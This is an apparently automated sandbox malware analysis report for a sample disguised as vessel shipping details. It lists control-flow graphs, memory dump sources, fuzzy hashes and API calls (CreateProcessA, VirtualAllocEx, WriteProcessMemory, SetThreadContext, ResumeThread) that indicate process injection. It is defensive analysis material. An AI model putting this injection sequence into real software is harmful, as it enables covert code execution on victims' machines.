                                                                                                                                                                      control_flow_graph 982 79aa758-79aa7ed 984 79aa7ef-79aa7f9 982->984 985 79aa826-79aa846 982->985 984->985 986 79aa7fb-79aa7fd 984->986 990 79aa848-79aa852 985->990 991 79aa87f-79aa8ae 985->991 988 79aa7ff-79aa809 986->988 989 79aa820-79aa823 986->989 992 79aa80b 988->992 993 79aa80d-79aa81c 988->993 989->985 990->991 994 79aa854-79aa856 990->994 1001 79aa8b0-79aa8ba 991->1001 1002 79aa8e7-79aa9a1 CreateProcessA 991->1002 992->993 993->993 995 79aa81e 993->995 996 79aa858-79aa862 994->996 997 79aa879-79aa87c 994->997 995->989 999 79aa866-79aa875 996->999 1000 79aa864 996->1000 997->991 999->999 1003 79aa877 999->1003 1000->999 1001->1002 1004 79aa8bc-79aa8be 1001->1004 1013 79aa9aa-79aaa30 1002->1013 1014 79aa9a3-79aa9a9 1002->1014 1003->997 1006 79aa8c0-79aa8ca 1004->1006 1007 79aa8e1-79aa8e4 1004->1007 1008 79aa8ce-79aa8dd 1006->1008 1009 79aa8cc 1006->1009 1007->1002 1008->1008 1010 79aa8df 1008->1010 1009->1008 1010->1007 1024 79aaa32-79aaa36 1013->1024 1025 79aaa40-79aaa44 1013->1025 1014->1013 1024->1025 1028 79aaa38 1024->1028 1026 79aaa46-79aaa4a 1025->1026 1027 79aaa54-79aaa58 1025->1027 1026->1027 1029 79aaa4c 1026->1029 1030 79aaa5a-79aaa5e 1027->1030 1031 79aaa68-79aaa6c 1027->1031 1028->1025 1029->1027 1030->1031 1032 79aaa60 1030->1032 1033 79aaa7e-79aaa85 1031->1033 1034 79aaa6e-79aaa74 1031->1034 1032->1031 1035 79aaa9c 1033->1035 1036 79aaa87-79aaa96 1033->1036 1034->1033 1037 79aaa9d 1035->1037 1036->1035 1037->1037
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 079AA98E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                      • Opcode ID: 8e3d6afee35bed1718d65fa675f252373c58561deb2932c31c8fdb1dbeded668
                                                                                                                                                                      • Instruction ID: f89f98c3ecf8a2303364b07ab58704695782da5a04e046a1150143fec42f9dee
                                                                                                                                                                      • Opcode Fuzzy Hash: 8e3d6afee35bed1718d65fa675f252373c58561deb2932c31c8fdb1dbeded668
                                                                                                                                                                      • Instruction Fuzzy Hash: DD917CB1D0121AEFDB14CF68C9407EDBBB6FF48314F1481A9E849A7250DB749986CF92

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1039 27fb2e0-27fb2ff 1040 27fb32b-27fb32f 1039->1040 1041 27fb301-27fb30e call 27faca4 1039->1041 1043 27fb343-27fb384 1040->1043 1044 27fb331-27fb33b 1040->1044 1046 27fb324 1041->1046 1047 27fb310 1041->1047 1050 27fb386-27fb38e 1043->1050 1051 27fb391-27fb39f 1043->1051 1044->1043 1046->1040 1098 27fb316 call 27fb578 1047->1098 1099 27fb316 call 27fb588 1047->1099 1050->1051 1052 27fb3c3-27fb3c5 1051->1052 1053 27fb3a1-27fb3a6 1051->1053 1058 27fb3c8-27fb3cf 1052->1058 1055 27fb3a8-27fb3af call 27facb0 1053->1055 1056 27fb3b1 1053->1056 1054 27fb31c-27fb31e 1054->1046 1057 27fb460-27fb47e 1054->1057 1060 27fb3b3-27fb3c1 1055->1060 1056->1060 1074 27fb485 1057->1074 1061 27fb3dc-27fb3e3 1058->1061 1062 27fb3d1-27fb3d9 1058->1062 1060->1058 1064 27fb3e5-27fb3ed 1061->1064 1065 27fb3f0-27fb3f9 call 27facc0 1061->1065 1062->1061 1064->1065 1070 27fb3fb-27fb403 1065->1070 1071 27fb406-27fb40b 1065->1071 1070->1071 1072 27fb40d-27fb414 1071->1072 1073 27fb429-27fb42d 1071->1073 1072->1073 1075 27fb416-27fb426 call 27facd0 call 27face0 1072->1075 1100 27fb430 call 27fb868 1073->1100 1101 27fb430 call 27fb841 1073->1101 1076 27fb4ce-27fb4d8 1074->1076 1077 27fb487 1074->1077 1075->1073 1076->1074 1078 27fb4d9-27fb520 1076->1078 1077->1078 1080 27fb488-27fb4cd 1077->1080 1082 27fb528-27fb553 GetModuleHandleW 1078->1082 1083 27fb522-27fb525 1078->1083 1080->1076 1081 27fb433-27fb436 1085 27fb459-27fb45f 1081->1085 1086 27fb438-27fb456 1081->1086 1087 27fb55c-27fb570 1082->1087 1088 27fb555-27fb55b 1082->1088 1083->1082 1086->1085 1088->1087 1098->1054 1099->1054 1100->1081 1101->1081
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 027FB546
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: 80b1ad44f9c8b6708b1f954212c73a526dc2f920e10d74f64197abd32c195d19
                                                                                                                                                                      • Instruction ID: 9604edac1eac887b68babf72bcb128540d138afd08aaf1c5f68f7d801bef7fc9
                                                                                                                                                                      • Opcode Fuzzy Hash: 80b1ad44f9c8b6708b1f954212c73a526dc2f920e10d74f64197abd32c195d19
                                                                                                                                                                      • Instruction Fuzzy Hash: BA812370A04B058FDBA4DF29D14476ABBF2FF88308F008929D58ADBB50DB74E945CB91
                                                                                                                                                                      APIs
                                                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 077400D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                                                      • Opcode ID: 2bf6075ddc7b89920bc5a815f0b54a21d14f3c918876254c8da0719d8a68dddb
                                                                                                                                                                      • Instruction ID: 4626cd8672ce689c9781b58162aeecb8b308515432b724ab61d3af6a4940b483
                                                                                                                                                                      • Opcode Fuzzy Hash: 2bf6075ddc7b89920bc5a815f0b54a21d14f3c918876254c8da0719d8a68dddb
                                                                                                                                                                      • Instruction Fuzzy Hash: 503159B29003499FDB11CFA9D884A9EFFF5EF09310F14849AE558A7221C371A904CFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027F59C9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 5357b53b9758ea112ef13b17e32a96bf3cc8b05d38e601c2fff3a3b6e8b2a7ef
                                                                                                                                                                      • Instruction ID: 230b182147cef01386453536b26683efd52d3aaf4bb03602ffca818ba4d33fb0
                                                                                                                                                                      • Opcode Fuzzy Hash: 5357b53b9758ea112ef13b17e32a96bf3cc8b05d38e601c2fff3a3b6e8b2a7ef
                                                                                                                                                                      • Instruction Fuzzy Hash: D441FFB0C04719CFDB24CFA9C884BDEBBB5BF48304F6080AAD509AB255DB756949CF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 027F59C9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Create
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                      • Opcode ID: 72ee56383b24cb89bd385e6acda9dc59d6624cf73facbbd038c9c3c82ffaf9b2
                                                                                                                                                                      • Instruction ID: 239209f6315f3a172d05a70720d278b5bc0c6550a556f4301b1c3a5b8ae9cf74
                                                                                                                                                                      • Opcode Fuzzy Hash: 72ee56383b24cb89bd385e6acda9dc59d6624cf73facbbd038c9c3c82ffaf9b2
                                                                                                                                                                      • Instruction Fuzzy Hash: 5441DFB0C0071DCBDB24CFA9C9847DDBBB6BF48304F2484AAD409AB255DB756989CF90
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079AA160
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: e38c135bdf0f2a768f07a5528c9c012bcc6fcc642c113657ebe5af5625b5b623
                                                                                                                                                                      • Instruction ID: c52446906bcae0f48994159ec3c6af59485ca7d3b8de7ea6b990644f449f497d
                                                                                                                                                                      • Opcode Fuzzy Hash: e38c135bdf0f2a768f07a5528c9c012bcc6fcc642c113657ebe5af5625b5b623
                                                                                                                                                                      • Instruction Fuzzy Hash: FB2146B1901359AFCB10CFA9C881BDEBBF5FF48314F10842AE958A7240C778A955CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • DrawTextExW.USER32(?,?,?,?,?,?), ref: 077400D7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DrawText
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2175133113-0
                                                                                                                                                                      • Opcode ID: 03a8556e8179da5ee8161f0fe7582a0cfe9634f5e3a8829efb779d576df96315
                                                                                                                                                                      • Instruction ID: 54193312e78fb81e97bd8f6dd9875dc907455873c3503cb962b94fe4f28071b8
                                                                                                                                                                      • Opcode Fuzzy Hash: 03a8556e8179da5ee8161f0fe7582a0cfe9634f5e3a8829efb779d576df96315
                                                                                                                                                                      • Instruction Fuzzy Hash: 4D21B2B5D002499FDB10CF9AD884ADEFBF5FF48360F14842AE919A7210D775A944CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 079AA160
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                      • Opcode ID: f6b54c12ab109e38ff1b60dd8cc179656f8c7b4a1f85076a2ba34027f306d42d
                                                                                                                                                                      • Instruction ID: 389639bb01f63473a5be855a04947039aa3ead171ab9eba344bb4b018951b082
                                                                                                                                                                      • Opcode Fuzzy Hash: f6b54c12ab109e38ff1b60dd8cc179656f8c7b4a1f85076a2ba34027f306d42d
                                                                                                                                                                      • Instruction Fuzzy Hash: D92127B1900359EFCB10CFA9C885BDEBBF5FF48314F108429E958A7250C7789954CBA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079A9FB6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 1527b04c8bbcdee36349b590206d56c74620ee7af7b8768404a56d7684c43c8b
                                                                                                                                                                      • Instruction ID: e73ff50d50196bff99c68c327762175016828be39cbaadb6e693c66210170939
                                                                                                                                                                      • Opcode Fuzzy Hash: 1527b04c8bbcdee36349b590206d56c74620ee7af7b8768404a56d7684c43c8b
                                                                                                                                                                      • Instruction Fuzzy Hash: 422137B19003099FDB10DFAAC4857EEBBF4EB88324F14842AD459A7241CB78A945CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027FD76E,?,?,?,?,?), ref: 027FD82F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                      • Opcode ID: f6e1bfcb9c7eeadd8bcaad394c9d08164297b07079a44e590a0f2cfedb83bd90
                                                                                                                                                                      • Instruction ID: cdca2ef4d575b2d12b8d614946023f652da5de443a4646452878dd60d29619bb
                                                                                                                                                                      • Opcode Fuzzy Hash: f6e1bfcb9c7eeadd8bcaad394c9d08164297b07079a44e590a0f2cfedb83bd90
                                                                                                                                                                      • Instruction Fuzzy Hash: 8021F2B5900208AFDB50CFAAD584AEEBBF4EB48310F10802AE918A7310D374A950CFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0774DA83
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: d0a68c9f82444595b1992e755859cb5e40ad8e6dab93e575cc2dbf8a7cd318f2
                                                                                                                                                                      • Instruction ID: 15f9fa5cfabee217370a47138f29968c7332828e05e4d346c468f1978ff72984
                                                                                                                                                                      • Opcode Fuzzy Hash: d0a68c9f82444595b1992e755859cb5e40ad8e6dab93e575cc2dbf8a7cd318f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 8A2104B69002099FCB10CF9AC584ADEBBF4EB49320F108429E998A7251C374A945CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 079AA640
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                                                      • Opcode ID: 820b683d3da7fc8f3a0f3a85c44fffcaf232e8e8a5de22f5de7ebf9b5f267f29
                                                                                                                                                                      • Instruction ID: 34df422f9e7f49bd0781472ca966e115740bfa220410f3d56c7495ddff7932d4
                                                                                                                                                                      • Opcode Fuzzy Hash: 820b683d3da7fc8f3a0f3a85c44fffcaf232e8e8a5de22f5de7ebf9b5f267f29
                                                                                                                                                                      • Instruction Fuzzy Hash: 062125B18003599FCB10DFAAC884AEEFBF5FF48320F10842AE558A7250C7389944CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 079A9FB6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                      • Opcode ID: 809eeb258410cdb2a17d05485b3982a6fd0bdbef0ff60085d42b249c3e379677
                                                                                                                                                                      • Instruction ID: c85c69e77c21e4f058c46df54f3722f11f7564388655a09c40fdf1bb7373a8f9
                                                                                                                                                                      • Opcode Fuzzy Hash: 809eeb258410cdb2a17d05485b3982a6fd0bdbef0ff60085d42b249c3e379677
                                                                                                                                                                      • Instruction Fuzzy Hash: CB2118B19003099FDB10DFAAC4857EEFBF5EF88324F148429D459A7241CB78A945CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,027FD76E,?,?,?,?,?), ref: 027FD82F
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                      • Opcode ID: d1590c37fef0c8dc2b3e303e7c09b69329de086ff7d971d5cd4f6eba835c16a6
                                                                                                                                                                      • Instruction ID: 6002bab975ad6b17fd7cfa4344c00bc0ccd700a7fc5a17a05ab4adb55fbb0625
                                                                                                                                                                      • Opcode Fuzzy Hash: d1590c37fef0c8dc2b3e303e7c09b69329de086ff7d971d5cd4f6eba835c16a6
                                                                                                                                                                      • Instruction Fuzzy Hash: B92100B5900209DFDB10CFA9D584ADEBBF5FB08310F14806AE958A7351C778A940CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 079AD025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: a0ed992cda27a713c62916b9022ec618b7816503db3c331261f6d482e65e9338
                                                                                                                                                                      • Instruction ID: b4e39faccff284409f6786edf563bc11951ed7a1e2d597b577c245b6d9c34db2
                                                                                                                                                                      • Opcode Fuzzy Hash: a0ed992cda27a713c62916b9022ec618b7816503db3c331261f6d482e65e9338
                                                                                                                                                                      • Instruction Fuzzy Hash: B72103B6900259EFDB10DF9AD445BDEFBF8EB48324F20881AE558A7600C375A944CFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079AA07E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: 8bab91cba225e561770ea5670f4bcf3b3d5f362edeb318fae31d32bd835d675e
                                                                                                                                                                      • Instruction ID: 24a933426fc0609bd7892cb3b7b470b784fd90943704204e74b70002003526b9
                                                                                                                                                                      • Opcode Fuzzy Hash: 8bab91cba225e561770ea5670f4bcf3b3d5f362edeb318fae31d32bd835d675e
                                                                                                                                                                      • Instruction Fuzzy Hash: E11156B28003499FCB10DFAAC845BDEBFF5EF88324F108829E559A7250C776A555CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0774DA83
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1736443108.0000000007740000.00000040.00000800.00020000.00000000.sdmp, Offset: 07740000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7740000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                      • Opcode ID: 42f610f33f9ce626845c65c5d5b010fa986988986204b79a743b614f2bf4fd2e
                                                                                                                                                                      • Instruction ID: 5d4b1698469fbf1a14a704d60c2b9c9f92eae3028532e826fd8ac61bceed644b
                                                                                                                                                                      • Opcode Fuzzy Hash: 42f610f33f9ce626845c65c5d5b010fa986988986204b79a743b614f2bf4fd2e
                                                                                                                                                                      • Instruction Fuzzy Hash: 8421E4B6900249DFCB10DF9AC984BDEFBF5FB49320F108429E958A7250D778A944CFA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 079AA07E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                      • Opcode ID: da90de3ac89561ea85a21864a58a4eb54e7f5d7d63df291f83ab5b0a54555062
                                                                                                                                                                      • Instruction ID: 0f9daac7399fdb49dedf8be0bffdd659d7d872578416c1b7bd5eb1f177c79410
                                                                                                                                                                      • Opcode Fuzzy Hash: da90de3ac89561ea85a21864a58a4eb54e7f5d7d63df291f83ab5b0a54555062
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C1126B19002599FCB10DFAAC844BDEBFF5EB88324F108829E559A7250C775A554CFA4
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 3c3d7a6849b56d489a82f848e0cccfb8eebc8c01fc87478927ea4d40a6b86cda
                                                                                                                                                                      • Instruction ID: 4ad397f5026f10a9da68610ef34f428854538a93c7e4e369a3bb8af50e95ac42
                                                                                                                                                                      • Opcode Fuzzy Hash: 3c3d7a6849b56d489a82f848e0cccfb8eebc8c01fc87478927ea4d40a6b86cda
                                                                                                                                                                      • Instruction Fuzzy Hash: 8D116AB19003499FCB10DFAAC8457DFFBF9EB88324F248429D459A7240CB35A945CF94
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                      • Opcode ID: 1f129b0da10217936627162bede5689a4796a95b06c62a88d003f002761dc6ed
                                                                                                                                                                      • Instruction ID: f83c830a52f8924119404400031d18b5373913df9f60ae567fdc8d9a5eb24b17
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f129b0da10217936627162bede5689a4796a95b06c62a88d003f002761dc6ed
                                                                                                                                                                      • Instruction Fuzzy Hash: 8E113AB19003499FDB10DFAAC4457DEFBF9EB88324F248419D459A7250CB75A944CF94
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 079AD025
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1737691724.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_79a0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: f02fe96d9812646d283932ecfe2dce49c55bac8d867eaa74d51a99e0795dc944
                                                                                                                                                                      • Instruction ID: 0296ef055252e2f3facfa6dff21606e8240ef3857adb51133fc0da7df875f1ee
                                                                                                                                                                      • Opcode Fuzzy Hash: f02fe96d9812646d283932ecfe2dce49c55bac8d867eaa74d51a99e0795dc944
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D1122B5900359EFDB10CF9AC448BDEBFF8EB49324F108819E558A7240C375A940CFA0
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 027FB546
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1728957466.00000000027F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_27f0000_HIROSHIMA STAR - VSL's_DETAILS.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                      • Opcode ID: bf7000115070e5029e264c83a8c5bc063978d30f3a7891a605ab14cbb21e4970
                                                                                                                                                                      • Instruction ID: 70c5bebeac9b23d2aeb803063409d5b617e8dc32b217967a5c67fe16ecaf6c2a
                                                                                                                                                                      • Opcode Fuzzy Hash: bf7000115070e5029e264c83a8c5bc063978d30f3a7891a605ab14cbb21e4970
